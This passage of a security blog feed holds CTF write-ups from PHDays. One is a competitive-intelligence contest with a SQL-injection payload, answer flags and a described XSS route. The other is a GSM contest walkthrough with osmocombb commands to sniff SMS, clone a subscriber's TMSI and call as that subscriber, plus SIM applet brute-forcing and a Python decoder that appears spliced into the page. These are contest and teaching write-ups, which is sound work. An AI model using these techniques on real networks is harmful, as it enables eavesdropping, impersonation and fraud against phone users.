null,null,text as content from templates where '1%'='1</span><br /><span style="font-family: Courier New, Courier, monospace;">-----------------------------214580240818081871851160929598</span><br /><span style="font-family: Courier New, Courier, monospace;">Content-Disposition: form-data; name="action"</span><br /><span style="font-family: Courier New, Courier, monospace;"><br /></span><span style="font-family: Courier New, Courier, monospace;">createTemplate</span><br /><span style="font-family: Courier New, Courier, monospace;">-----------------------------214580240818081871851160929598--</span><br /><br />you may gain access to news templates on the site to find the answer (<b>Boris_The_Emperor</b>) and another piece of intel.<br /><div class="separator" style="clear: both; text-align: center;"><br /></div><br /><div 
class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-XKQIwgl40_w/VZ0oGCGFKfI/AAAAAAAAFTo/cc_OrGdtzEw/s1600/33.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="242" src="http://2.bp.blogspot.com/-XKQIwgl40_w/VZ0oGCGFKfI/AAAAAAAAFTo/cc_OrGdtzEw/s400/33.png" width="400" /></a></div><br /><u>Correct answers: 0</u><br /><br /><b><span style="font-size: large;">5. The stock exchange market financial director was incriminated, but there was no evidence. Help to get him in jail.</span></b><br /><br />Finally, you need to help justice along and put the stock market’s financial director in jail.<br /><br /><b>5.1. His name is Prabhat SAVITR. First, we need to find what gov got on him. Find his case ID.</b><br />This will sound familiar to those who have played Competitive Intelligence before. There is a relation between case IDs and photo IDs, and you can get the photo ID of the guy you need thanks to the directory listing.<br /> <br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-Nhq1Azg4tLA/VZ0oMjvsu8I/AAAAAAAAFTw/u-awEqPNW6E/s1600/34.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="191" src="http://3.bp.blogspot.com/-Nhq1Azg4tLA/VZ0oMjvsu8I/AAAAAAAAFTw/u-awEqPNW6E/s400/34.png" width="400" /></a></div>This time we added a salt to md5(id): just do your homework in the public MD5 databases, and you’ll find it — <b>Chipp37</b>.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-WUDAqoajDIA/VZ0oXGoa0sI/AAAAAAAAFUA/FGj00O7bcKE/s1600/36.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="288" src="http://4.bp.blogspot.com/-WUDAqoajDIA/VZ0oXGoa0sI/AAAAAAAAFUA/FGj00O7bcKE/s400/36.png" width="400" /></a></div><br />That means the answer must be <b>case-id=md5(Chipp371337)= 8bc875dbed7b0ecd966bed3c8ec750fa</b><br /><br 
/><u>Correct answers: 39</u><br /><br /><b>5.2. There was no evidence that the financial director was at the crime scene. We can blackmail him if we know deviceid and iccid of his phone and SIM. Get them for us (format deviceid;iccid)</b><br />The deviceid is easily found in the case documents. You can download them by entering the ID from the previous task into the form at http://ussu.phdays.com/getdocument.php. To get the iccid, you need to google a substring of the deviceid. The correct answer is <b>a94360c365ab38810639911d355103c86367d5ba;897019903020414671</b>.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-ZA17l1Hnzys/VZ0oj5sRMtI/AAAAAAAAFUI/00cJt1j6sDs/s1600/37.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="191" src="http://2.bp.blogspot.com/-ZA17l1Hnzys/VZ0oj5sRMtI/AAAAAAAAFUI/00cJt1j6sDs/s400/37.png" width="400" /></a></div><br /><br /><u>Correct answers: 3</u><br /><u><br /></u><b>5.3. Where is the director hiding now? We need to know the city.</b><br />Unfortunately, the players only reached this task by the end of the second day, so no one was able to do it properly. Yet one team brute-forced the answer. What we actually wanted you to do was to use XSS to get into the DOM of a page the victim visits all the time (with the help of the input data obtained in the previous challenge). From the logs it was obvious that he uses a 3G modem made by a mystery firm named OiWei. The modem’s web pages at 192.168.44.1 are reachable from that page thanks to the Access-Control-Allow-Origin: * header the modem sends. This would allow capturing the cellid and other data to find out the director’s location — <b>Hamilton</b>.<br /><br /><u>Correct answers: 1</u><br /><br /><b>5.4. As you know by now, the stock market has a backdoor for executives. 
Give us the private key (Private-MAC for proof would be enough)</b><br />Apart from the location, you may retrieve the stock market backend address from the modem. We hoped that it would then be enough to exploit a 0-day in PHP to bypass open_basedir and read the key from <b>/home</b>. But alas.<br /><br /><u>Correct answers: 0</u><br /><br /><b><span style="font-size: large;">Summary</span></b><br /><br />51 participants were not able to answer a single question.<br /><br />First place went to djecka – he was the first to give correct answers to 9 questions.<br /><br />The top team was rdot — they cracked 12 tasks.<br /><br /><style type="text/css">.tg {border-collapse:collapse;border-spacing:0;} .tg td{font-family:Arial, sans-serif;font-size:14px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;} .tg th{font-family:Arial, sans-serif;font-size:14px;font-weight:normal;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;} </style> <table class="tg"> <thead><tr> <th class="tg-031e">#</th> <th class="tg-031e">Participant</th> <th class="tg-031e">Score</th> </tr></thead><tbody><tr> <td class="tg-031e">1</td> <td class="tg-031e">djecka</td> <td class="tg-031e">1700</td> </tr><tr> <td class="tg-031e">2</td> <td class="tg-031e">sharsil</td> <td class="tg-031e">1700</td> </tr><tr> <td class="tg-031e">3</td> <td class="tg-031e">MZC</td> <td class="tg-031e">1600</td></tr></tbody></table></div>Unknownnoreply@blogger.com435tag:blogger.com,1999:blog-5176771794789502609.post-43845841283805467952015-07-03T14:18:00.001+03:002015-07-03T14:18:49.178+03:00The MiTM Mobile Contest: GSM Network Down at PHDays V<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-LqksqismI7w/VZZqrecJvXI/AAAAAAAAFIQ/vlnS8ruLWrY/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="426" src="http://2.bp.blogspot.com/-LqksqismI7w/VZZqrecJvXI/AAAAAAAAFIQ/vlnS8ruLWrY/s640/1.png" width="640" 
/></a></div><br />Although we have published several research works on <a href="http://blog.ptsecurity.com/2014/08/cell-phone-tapping-how-it-is-done-and.html">cell phone tapping</a>, <a href="http://blog.ptsecurity.com/2015/01/mobile-eavesdropping-via-ss7-and-first.html">SMS interception</a>, <a href="http://blog.ptsecurity.com/2014/04/search-and-neutralize-how-to-determine.html">subscriber tracking</a>, and <a href="http://blog.ptsecurity.com/2014/12/4g-security-hacking-usb-modem-and-sim.html">SIM card cracking</a>, lots of our readers still regard those stories as some kind of magic used only by intelligence agencies. The MiTM Mobile contest was held at PHDays for the first time, and it let the participants realize how easily an attacker can conduct the above-mentioned attacks having only a $10 cell phone with some hacker freeware.<br /><a name='more'></a><br /><span style="font-size: large;"><b>Contest conditions and technologies</b></span><br /><blockquote class="tr_bq">You've got a corporate cell phone of a MiTM Mobile network user.<br />Through the DarkNet you have obtained some information that can be useful:</blockquote><blockquote class="tr_bq">1) The codes for publes (PHDays game currency – Pseudo rUBLE) are regularly sent to the phone number of the corporation's chief accountant — 10000. </blockquote><blockquote class="tr_bq">2) The financial director is missing, nobody can get him on the phone for several days, his cell phone is turned off, but he is still getting passwords. </blockquote><blockquote class="tr_bq">3) You can obtain key information by calling the number 2000, but there is authorization by the caller's number. We also managed to find out the phone number of the director's private secretary — 77777. He must have access. </blockquote><blockquote class="tr_bq">There are other numbers in the network through which some employees get important information, but, unfortunately, we failed to find them. 
Besides, don't forget — you can always come across someone's private information in the corporate network.</blockquote>The CTF participants got about the same intro at the MiTM Mobile contest held at PHDays V.<br /><br />We deployed a real mobile operator infrastructure for the contest. It included a base station, cell phones, landline phones, and SIM cards. The name of the contest — MiTM Mobile — was picked for a reason: we wanted to emphasize the vulnerability of our network. For the logo, we chose the Kraken (well, kind of) destroying a cell tower.<br /><br />So much for the operator's trappings; let's now look at the network implementation. Our hardware solution was a device with a simple name — UmTRX (the manufacturer's site: umtrx.org/hardware). The network's wireless part was based on this unit. The base station and GSM functionality (the software part) was implemented with the Osmocom/OpenBTS stack.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-J0-UNhGhtmU/VZZrZzL921I/AAAAAAAAFIY/9RXgTKjjCvU/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="http://4.bp.blogspot.com/-J0-UNhGhtmU/VZZrZzL921I/AAAAAAAAFIY/9RXgTKjjCvU/s640/2.png" width="420" /></a></div><br /><div style="text-align: center;"><i>UmTRX is the heart of MiTM Mobile.</i></div><br />We also ordered SIM cards for a simple and quick network registration. The MiTM Mobile network credentials were written to them, and the card data were registered in the network. To simplify air tapping and make the players' life easier, we disabled encryption in our network (A5/0). Apart from the SIM cards, the participants were provided with Motorola C118 cell phones and USB-UART cables (CP2102). 
All this, including the osmocombb stack, allowed the participants to tap the air, intercept SMS messages intended for other users, and make phone calls in the network on behalf of another user.<br /><br />Each team got a SIM card, cable, cell phone, and virtual machine image with the osmocombb stack build to experiment with.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-FgC71qH7wRo/VZZrgmwypsI/AAAAAAAAFIg/fIUNB4HdqbM/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="506" src="http://4.bp.blogspot.com/-FgC71qH7wRo/VZZrgmwypsI/AAAAAAAAFIg/fIUNB4HdqbM/s640/3.png" width="640" /></a></div><br /><b><span style="font-size: large;">Review of Tasks</span></b><br /><br />Some theory at first:<br /><br /><ul style="text-align: left;"><li><b><a href="https://en.wikipedia.org/wiki/International_mobile_subscriber_identity">IMSI</a> </b>— International Mobile Subscriber Identity, stored in the SIM card. </li><li><a href="https://en.wikipedia.org/wiki/MSISDN"><b>MSISDN</b></a> — Mobile Subscriber ISDN Number, the subscriber's phone number, assigned to the IMSI in the operator’s infrastructure.</li><li><a href="http://en.wikipedia.org/wiki/Mobility_management#TMSI"><b>TMSI</b></a> — Temporary Mobile Subscriber Identity, randomly assigned by the network to every mobile in the area the moment it is switched on.</li></ul><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-2qRbYIyaA4k/VZZr2Uwt9qI/AAAAAAAAFIo/1xejcnii6Mw/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="404" src="http://4.bp.blogspot.com/-2qRbYIyaA4k/VZZr2Uwt9qI/AAAAAAAAFIo/1xejcnii6Mw/s640/4.png" width="640" /></a></div><br />IMSI is the magic number specified in the SIM card. It looks something like this — 250-01-XXXXXXXXXX, where 250 is the country code (Russia), 01 is the operator code (MTS), and XXXXXXXXXX is a unique ID. 
A subscriber is identified and authorized in the operator's network by the IMSI.<br /><br />In this case, we have a sysmocom SIM card with country code 901, operator code 70, and subscriber ID 0000005625 in the operator's network (see fig.).<br /><br />The second thing you need to remember: the MSISDN, your cell phone number (for example, +79171234567), is stored in the operator's database, not on the SIM card. During a call, the base station inserts this number according to the IMSI <--> MSISDN mapping table (in a real network the MSC/VLR performs this function). Or it doesn't (in the case of an anonymous call).<br /><br />TMSI is a 4-byte temporary identifier given to the subscriber after authorization.<br /><br />Now that we know this, let's continue.<br /><br />We need to run the osmocombb stack. The steps are quite simple. Connect the cable to the computer and pass it through to the virtual machine. A device named /dev/ttyUSB0 should appear there. After that, connect a TURNED-OFF cell phone to the cable through its audio jack.<br /><br />Then you open two consoles. In the first one, you must run the following command:<br /><br /><span style="font-family: Courier New, Courier, monospace;">#~/osmocom-bb-master/src/host/osmocon/osmocon -p /dev/ttyUSB0 -m c123xor -c ~/osmocom-bb-master/src/target/firmware/board/compal_e88/layer1.highram.bin</span><br /><br />Now press the red button on the cell phone to turn it on. The command uploads the firmware into the phone and opens a socket that mediates between the phone and the applications. This is the so-called layer 1 of the OSI model. 
It establishes physical interaction with the network.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-LIBxk5wEXkw/VZZsA4KdeTI/AAAAAAAAFIw/5MPSDK6gTTU/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="http://2.bp.blogspot.com/-LIBxk5wEXkw/VZZsA4KdeTI/AAAAAAAAFIw/5MPSDK6gTTU/s640/5.png" width="618" /></a></div><br />This is roughly what layer1 outputs to the console after it has been uploaded into the phone (nothing of interest here, though).<br /><br />In the second console, you must run the following command:<br /><br /><span style="font-family: Courier New, Courier, monospace;">#~/osmocom-bb-sylvain/src/host/layer23/src/misc/ccch_scan -a 774 -i 127.0.0.1</span><br /><br />This command establishes layers 2-3 of the OSI model, namely air tapping in search of CCCH (Common Control Channel) packets.<br /><br />774 is the ARFCN we broadcast on. Yeah, nobody needs to look for our operator's channel. We did everything we could to make your life easier, our dear participants :)<br /><br />-i 127.0.0.1 is the interface the packets will be sent to.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-ky3qtHP8o4s/VZZsKLLRNOI/AAAAAAAAFI4/Dt8TgReIGXs/s1600/6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="390" src="http://1.bp.blogspot.com/-ky3qtHP8o4s/VZZsKLLRNOI/AAAAAAAAFI4/Dt8TgReIGXs/s640/6.png" width="640" /></a></div><br />Now you launch Wireshark. It will do everything for you: for instance, it will reassemble the necessary packets into an SMS, parse the TPDU/PDU format, and show everything in a readable form.<br /><br />Remember, you were to intercept an SMS for the first task. 
In order to make browsing in Wireshark more convenient and keep the screen "clean", you should set the filter to gsm_sms packets.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-UTQMfKrVQnA/VZZsO--VrWI/AAAAAAAAFJA/kTD8-srye6E/s1600/7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="454" src="http://3.bp.blogspot.com/-UTQMfKrVQnA/VZZsO--VrWI/AAAAAAAAFJA/kTD8-srye6E/s640/7.png" width="640" /></a></div><br />Now you can see SMS messages on the air. Congrats, you've completed the first task! If you had been at PHDays V, you would have seen the SMS message containing the code for getting publes. The code was aired constantly during the two days, every five minutes, and even at night.<br /><br />You must run layer1 again for the second task (or you can just keep it running after the previous one).<br /><br />In the second console, you run the following command as layer 2-3:<br /><br /><span style="font-family: Courier New, Courier, monospace;">#~/osmocom-bb-master/src/host/layer23/src/mobile/mobile -i 127.0.0.1</span><br /><br />Nothing really hard here. The mobile application can function as a virtual cell phone. In order to get access to these functions, open a third console and run<br /><br /><span style="font-family: Courier New, Courier, monospace;">$ telnet 127.0.0.1 4247</span><br /><br />A Cisco-like interface will open. You must enable the extended mode:<br /><br /><span style="font-family: Courier New, Courier, monospace;">OsmocomBB> enable</span><br /><br />After that, you should display the list of available commands:<br /><br /><span style="font-family: Courier New, Courier, monospace;">OsmocomBB# list</span><br /><br />What do you think the clone command does? Well, its name speaks for itself – you can clone a subscriber. In the description of the command, you can see that it accepts a TMSI as an argument. 
If you find out the victim's TMSI and enter it into your phone, you will be able to connect to the network in place of the original subscriber.<br /><br />Throughout the conference, we kept trying to send an SMS message to a phone number that was absent from the network. If a participant passed the TMSI the base station was paging as the clone command parameter, he or she would get the flag with the code for money.<br /><br /><span style="font-family: Courier New, Courier, monospace;">OsmocomBB# clone 1 5cce0f7f</span><br /><br />It was quite easy to spot the base station's request to the subscriber. You could look for gsmtap packets in Wireshark containing a Paging Request Type 1 (the request the base station makes when a call is originated).<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-H70LJ9m_IuQ/VZZsw1R_xSI/AAAAAAAAFJI/JnrqFqY7clk/s1600/8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="416" src="http://3.bp.blogspot.com/-H70LJ9m_IuQ/VZZsw1R_xSI/AAAAAAAAFJI/JnrqFqY7clk/s640/8.png" width="640" /></a></div><br />Alternatively, you could use the second console, where mobile was running:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-QoshXXCkHMg/VZZtlAIyP8I/AAAAAAAAFJQ/Dm4lSxmPf54/s1600/9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="390" src="http://4.bp.blogspot.com/-QoshXXCkHMg/VZZtlAIyP8I/AAAAAAAAFJQ/Dm4lSxmPf54/s640/9.png" width="640" /></a></div><br />After you enter the TMSI, you will receive an SMS message intended for the original subscriber.<br /><br />Now you have enough information for the third task. Here, you have to pretend to be another subscriber, as in the previous task. You know his number, but not his TMSI. What can you do? It's easy: you just have to send an SMS message to the subscriber or call him at the number 77777. 
You will see the base station's requests to subscriber 77777, as in the previous example. Note: you must use another cell phone for the call or SMS; otherwise your Motorola won't see the base station's broadcast requests intended for the target subscriber.<br /><br />After that, you need to load the TMSI into your phone by means of the clone command and call the precious number!<br /><br /><span style="font-family: Courier New, Courier, monospace;">OsmocomBB# call 1 2000</span><br /><br />Now take the Motorola and listen to the code. Participants who did everything right heard it; otherwise, a joke was the sole thing they got :)<br /><br />Additionally, there were SMS messages in the network announcing a new voice message. If the participants hadn't been lazy and had opened the device's phone book, they would have seen the voice mail number. Calling this number, you could hear insider information: data about rises and falls in the price of MiTM Mobile shares.<br /><br />The fourth task was related not so much to GSM as to the vulnerable SIM cards used for accessing the network. Apart from the phone, each team got a SIM card with a pre-installed application showing a greeting — "Welcome to PHDays V". Lukas Kuzmiak and Karsten Nohl created a utility called SIMTester for finding vulnerable applets. Its key feature is the ability to work through osmocom cell phones. So, you plug the SIM card into the phone, connect it to your computer, and start the search. 
After a couple of minutes, you can analyze the data obtained:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-wtjQXzHakow/VZZtv5PBQCI/AAAAAAAAFJY/9FU_cdSx5pc/s1600/10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="248" src="http://2.bp.blogspot.com/-wtjQXzHakow/VZZtv5PBQCI/AAAAAAAAFJY/9FU_cdSx5pc/s640/10.png" width="640" /></a></div><br />Apart from lots of applets disclosing enough information for <a href="http://blog.ptsecurity.com/2014/12/4g-security-hacking-usb-modem-and-sim.html">key brute forcing</a>, you were provided with a "red" application, which does not require any secret keys to access. Let's analyse it separately:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-joIbqasR0MM/VZZt6h055II/AAAAAAAAFJg/dg59LQVGMYo/s1600/11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="308" src="http://3.bp.blogspot.com/-joIbqasR0MM/VZZt6h055II/AAAAAAAAFJg/dg59LQVGMYo/s640/11.png" width="640" /></a></div><br />The last two bytes of the SIM card reply are the status bytes, where, for instance, 0x9000 means that the command has completed successfully. In this case, you get 0x9124, which means the card has 36 bytes it wants to return to us. 
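<br /><br />As an added example (not SIMTester's or the contest's code), the following Python decoder parses card responses like the ones quoted in this section: it reads the status word (0x9000 = success; 0x91xx = a proactive command of xx bytes is waiting to be fetched, so 0x9124 announces exactly the 36-byte D0 command) and then the proactive-command TLVs defined in ETSI TS 102 223 (D0 = proactive command, 81 = command details, 82 = device identities, 8D = text string). The sample inputs are the two hex strings shown in this section, each ending with the 9000 status of the fetch itself; the tag and type tables cover only what those samples need.<br /><br />

```python
"""Added example (not SIMTester's or the contest's code): decode SIM responses like
the two quoted in this write-up. Assumption: only the status words and TLV tags that
appear in those responses are handled. Sample inputs are the page's own hex strings."""
import binascii

# Constructed from the two responses shown in the write-up: the fetched proactive
# command (tag D0) followed by the 9000 status word printed after it.
BAD_CLA_RESPONSE = bytes.fromhex(
    "D0228103012100820281028D1704596F752061726520636C6F73652C2062616420434C419000")
FLAG_RESPONSE = bytes.fromhex(
    "D0378103012100820281028D2C04596F757220666C61673A20"
    "35306634323865623762623163313234323231383333366435306133376239659000")

# ETSI TS 102 223 values needed for these samples (not a complete table)
COMMAND_TYPES = {0x21: "DISPLAY TEXT", 0x13: "SEND SHORT MESSAGE"}
DEVICE_IDS = {0x01: "keypad", 0x02: "display", 0x81: "UICC", 0x82: "terminal"}

def describe_status(sw1, sw2):
    """9000 = success; 91xx = the card has xx bytes of a proactive command to FETCH."""
    if (sw1, sw2) == (0x90, 0x00):
        return "OK"
    if sw1 == 0x91:
        return f"proactive command pending, {sw2} bytes to FETCH"
    return f"unhandled status {sw1:02X}{sw2:02X}"

def parse_tlvs(data):
    """Simple TLVs with a one-byte tag and one-byte length, as used inside D0."""
    out, i = [], 0
    while i < len(data):
        if i + 2 > len(data):
            raise ValueError("truncated TLV header")
        tag, length = data[i], data[i + 1]
        value = data[i + 2:i + 2 + length]
        if len(value) != length:
            raise ValueError("truncated TLV value")
        out.append((tag, value))
        i += 2 + length
    return out

def parse_proactive(response):
    """Split off the trailing status word, check the D0 envelope, decode its TLVs."""
    body, sw1, sw2 = response[:-2], response[-2], response[-1]
    result = {"status": describe_status(sw1, sw2)}
    if len(body) < 2 or body[0] != 0xD0 or body[1] != len(body) - 2:
        raise ValueError("not a well-formed proactive command")
    for tag, value in parse_tlvs(body[2:]):
        tag &= 0x7F  # bit 8 is the comprehension-required flag, not part of the tag id
        if tag == 0x01:    # command details: number, type, qualifier
            result["command"] = COMMAND_TYPES.get(value[1], f"type 0x{value[1]:02X}")
        elif tag == 0x02:  # device identities: source, destination
            result["from"] = DEVICE_IDS.get(value[0], f"0x{value[0]:02X}")
            result["to"] = DEVICE_IDS.get(value[1], f"0x{value[1]:02X}")
        elif tag == 0x0D:  # text string: data coding scheme, then the text
            dcs, text = value[0], value[1:]
            # DCS 0x04 is 8-bit data, which both samples use; anything else
            # (e.g. 7-bit packed) is left as hex rather than guessed at
            result["text"] = text.decode("latin-1") if dcs == 0x04 else binascii.hexlify(text).decode()
    return result
```

<br /><br />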
Let's change the program code a little and see what kind of data it is.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-6nMHW6_Swtc/VZZuBNLu1vI/AAAAAAAAFJo/tLlimhyak94/s1600/12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="96" src="http://3.bp.blogspot.com/-6nMHW6_Swtc/VZZuBNLu1vI/AAAAAAAAFJo/tLlimhyak94/s640/12.png" width="640" /></a></div><br />After decoding, you will get:<br /><br /><span style="font-family: Courier New, Courier, monospace;">>>> 'D0228103012100820281028D1704596F752061726520636C6F73652C2062616420434C419000'.decode('hex')</span><br /><span style="font-family: Courier New, Courier, monospace;">'\xd0"\x81\x03\x01!\x00\x82\x02\x81\x02\x8d\x17\x04You are close, bad CLA\x90\x00'</span><br /><br />You need to brute force all the possible CLA and INS values for the instructions sent in the binary SMS message, and you will get the flag:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-PXqJc7nus_o/VZZuH3XQWmI/AAAAAAAAFJw/1fhyQ35MOsI/s1600/13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="204" src="http://2.bp.blogspot.com/-PXqJc7nus_o/VZZuH3XQWmI/AAAAAAAAFJw/1fhyQ35MOsI/s640/13.png" width="640" /></a></div><br /><span style="font-family: Courier New, Courier, monospace;">>>> 'D0378103012100820281028D2C04596F757220666C61673A2035306634323865623762623163313234323231383333366435306133376239659000'.decode('hex')</span><br /><span style="font-family: Courier New, Courier, monospace;">'\xd07\x81\x03\x01!\x00\x82\x02\x81\x02\x8d,\x04Your flag: 50f428eb7bb1c1242218336d50a37b9e\x90\x00'</span><br /><br />That's it, as far as the tasks are concerned.<br /><br /><b><span style="font-size: large;">Contest winners and surprises</span></b><br /><br />All the PHDays participants could try their hand at the MiTM Mobile contest together with the CTF teams: those who wished to 
take part were provided with all the necessary equipment and a virtual machine. Overall, there were more than ten participants on top of the CTF teams.<br /><br />However, the only one who managed to intercept the SMS message in the middle of the first day was Gleb Cherbov, who ultimately became the contest winner.<br /><br />Only the More Smoked Leet Chicken team managed to complete three tasks by the beginning of the second day. The fourth task was available only to the CTF participants, but everybody failed it.<br /><br />Forum visitors could notice that LTE and 3G occasionally disappeared, and sometimes the network was unavailable if you came close to the zone with the GSM jammers, which looked like this:<br /> <br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-igWcqxbaGbc/VZZuRKv6jpI/AAAAAAAAFJ4/29HHcsxluNU/s1600/7b40948643af48a5aae0ec8a2347cbc8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="516" src="http://1.bp.blogspot.com/-igWcqxbaGbc/VZZuRKv6jpI/AAAAAAAAFJ4/29HHcsxluNU/s640/7b40948643af48a5aae0ec8a2347cbc8.png" width="640" /></a></div><br />Some people were getting messages from the number 74957440144 (or from an anonymous one) with the text "SMS_from_bank" or some other "harmless spam". It was connected with the operation of the MiTM Mobile network.<br /><br />Also, some "lucky ones" got the following message by the end of the second day:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-gB5zwX_2PBw/VZZuWcjhQcI/AAAAAAAAFKA/JuasRfib9h4/s1600/15.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="http://1.bp.blogspot.com/-gB5zwX_2PBw/VZZuWcjhQcI/AAAAAAAAFKA/JuasRfib9h4/s640/15.png" width="360" /></a></div><br />This joke has nothing to do with the functioning of MiTM Mobile, but it reminds everyone once again of general safety rules. 
Watch out for your beloved phone, which suddenly finds the MosMetro_Free network (the free WiFi network in the Moscow underground) in a place where it shouldn't be, connects to it, and lots of apps walk straight into a trap. Some of them use the phone number as an identifier. An attacker can obtain this number and then send messages through an SMS gateway to all the "lucky ones".<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-OkgnvmJM8kc/VZZudfflGmI/AAAAAAAAFKI/TBxjDWdlq_A/s1600/706b082b26d94077a67941fad4e80390.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="174" src="http://2.bp.blogspot.com/-OkgnvmJM8kc/VZZudfflGmI/AAAAAAAAFKI/TBxjDWdlq_A/s640/706b082b26d94077a67941fad4e80390.png" width="640" /></a></div><br />P.S. Here are the details about the network components for all those who would like to run a contest similar to our MiTM Mobile.<br /><br />The UmTRX itself is an SDR (Software Defined Radio), i.e. "just a radio". All the manuals concerning the configuration can be found at umtrx.org or osmocom.org. You may also use a ready-made solution from UmTRX — UmDESK, which has everything pre-installed. All you need is to fill in the configuration files according to the manual and start broadcasting.<br /><br />You can find an image of the osmocombb stack <a href="http://phdays.ru/ctf_mobile.7z">here</a> (we highly recommend VMware 11). This build is enough for experimenting. 
SIM cards are not necessary, but you have to get a cell phone and any USB-UART cable.<br /><br />You can choose any cell phone from the list: <a href="http://bb.osmocom.org/trac/wiki/Hardware/Phones">http://bb.osmocom.org/trac/wiki/Hardware/Phones</a><br />Cables: <a href="http://bb.osmocom.org/trac/wiki/Hardware/SerialCable">http://bb.osmocom.org/trac/wiki/Hardware/SerialCable</a><br /><br />And yes, PL2303 and FT232 cables can be found almost everywhere. Unsoldering a 2.5 mm mini-jack is a piece of cake.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-sL1v38Cf_sQ/VZZusP72kRI/AAAAAAAAFKQ/wOHW34Tk5Hg/s1600/16.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="http://1.bp.blogspot.com/-sL1v38Cf_sQ/VZZusP72kRI/AAAAAAAAFKQ/wOHW34Tk5Hg/s640/16.png" width="640" /></a></div><br />You can order SIM cards and the cable here: <a href="http://shop.sysmocom.de/">http://shop.sysmocom.de/</a><br /><br />For example:<br />USB-UART (CP2102): <a href="http://shop.sysmocom.de/products/cp2102-25">http://shop.sysmocom.de/products/cp2102-25</a><br />SIM cards: <a href="http://shop.sysmocom.de/t/sim-card-related/sim-cards">http://shop.sysmocom.de/t/sim-card-related/sim-cards</a><br /><br />You can find cell phones on eBay, buy them in pedestrian underpasses, or order them from China: on average, you will spend $10 per phone.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-EMhhPB2G7to/VZZvSq6Jc0I/AAAAAAAAFKY/UOdOiMMOvzA/s1600/17.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="http://2.bp.blogspot.com/-EMhhPB2G7to/VZZvSq6Jc0I/AAAAAAAAFKY/UOdOiMMOvzA/s640/17.png" width="640" /></a></div><br />We want to express special gratitude to the guys from Fairwaves (they are the ones who make UmTRX, UmDESK, UmROCKET, etc.) for consulting and for the equipment provided for testing. They do a GREAT thing! 
And also, special thanks to Ivan.<br /><br /></div><br /><br />Best Reverser Write-Up: Analyzing Uncommon Firmware (2015-06-30)<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-WT2Y1ftrTVU/VZJKCDEyK2I/AAAAAAAAFIA/IEGzX1RUD8U/s1600/new29-061.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-WT2Y1ftrTVU/VZJKCDEyK2I/AAAAAAAAFIA/IEGzX1RUD8U/s1600/new29-061.jpg" /></a></div><div class="MsoNormal"><span lang="EN-US"><br /></span></div><div class="MsoNormal"><span lang="EN-US"><span style="font-family: inherit;"><br /></span></span></div><div class="MsoNormal"><span lang="EN-US"><span style="font-family: inherit;">While developing tasks for PHDays’ reverse engineering contest, we aimed to replicate real problems that RE specialists might face, while avoiding tasks with cliché solutions.<o:p></o:p></span></span></div><div class="MsoNormal"><span lang="EN-US"><span style="font-family: inherit;"></span></span><br /><a name='more'></a><span lang="EN-US"><span style="font-family: 